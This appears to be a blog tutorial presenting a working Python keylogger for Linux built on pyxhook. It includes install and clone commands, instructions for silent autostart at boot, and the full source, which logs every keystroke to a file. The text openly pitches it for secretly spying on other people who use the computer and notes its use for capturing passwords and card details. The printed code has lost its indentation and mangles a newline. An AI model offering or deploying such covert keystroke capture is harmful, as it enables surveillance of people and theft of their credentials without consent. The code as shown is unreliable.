Keylogger is a program used to monitor keystrokes. the keystrokes are stored in a file somewhere.
Lets say you want to see what other people were doing on your computer, when you were away. you can just start the keylogger and spy on them!
A Keylogger can be used by a hacker to record sensitive information like usernames, password or credit card detail etc.
NOTE: This piece of code should not be used for unethical means. if you do so you are on your own risk.
I have written a very simple keylogger in python using pyxhook module which is an implementation of pyhook module (for Windows OS).
Let’s first see how to run the keylogger and after that we will understand how it is written.
Download and Run the keylogger
pyxhook requires python-xlib. Install it if you don’t have it already.
sudo apt-get install python-xlib
To run this program you need the pyxhook module and my keylogger program that I have explained in the next section below.
I have put all required files my github repository.
make sure you have git installed
sudo apt-get install git
now, execute the below commands
aman@vostro:~$ git clone https://github.com/hiamandeep/py-keylogger.git
Cloning into 'py-keylogger'...
remote: Counting objects: 23, done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 23 (delta 9), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (23/23), done.
Checking connectivity... done.
aman@vostro:~$ cd py-keylogger/
Note: Before you finally run the program, open the keylogger.py file and set log_file variable to your desired location for your log file.
Give an absolute path, for example: /home/YourUsername/Desktop/file.log (replace YourUsername with your actual username)
aman@vostro:~/py-keylogger$ python keylogger.py
<class 'Xlib.protocol.request.QueryExtension'>
<class 'Xlib.protocol.request.QueryExtension'>
RECORD extension version 1.13
now, the keylogger is active and is recording your keystrokes in file.log. press the grave key ' to stop it and view your file.log
Note: grave key is below Esc key
You can also make this program start automatically after each boot. In ubuntu, simply add this command to startup applications like shown in the image below.
python /home/aman/py-keylogger/keylogger.py
Again, make sure you give your own file path in the command.
Understand how this keylogger is written
We start by importing the necessary modules which in this case is only pyxhook
then specify the location of your log file (the file, where the keystrokes will be stored)
Make sure you change the log_file variable to the path of your log file.
The file will be automatically created, if not existing at your specified path.
We create a new instance of the HookManager class.
and set keydown variable to the function to execute when a key is pressed (OnkeyPress function)
OnKeyPress – is the function which executes every time a key is pressed.
here, the log file is opened in append mode and the keystrokes are appended to the log file. a new line character is written to the file to get the keys on new lines.
if the grave key ` is pressed the log file is closed and session is terminated.
import pyxhook
#change this to your log file's path
log_file='/home/aman/Desktop/file.log'
#this function is called everytime a key is pressed.
def OnKeyPress(event):
fob=open(log_file,'a')
fob.write(event.Key)
fob.write('n')
if event.Ascii==96: #96 is the ascii value of the grave key (`)
fob.close()
new_hook.cancel()
#instantiate HookManager class
new_hook=pyxhook.HookManager()
#listen to all keystrokes
new_hook.KeyDown=OnKeyPress
#hook the keyboard
new_hook.HookKeyboard()
#start the session
new_hook.start()
you can get more events information like time of the event, event window name and Mouse events can also be tracked, you can refer to the documentation in link below.
pyxhook doesn’t have any official documentation but the pyhook documentation works fine for most of the stuff.
Resources:
pyHook API documentation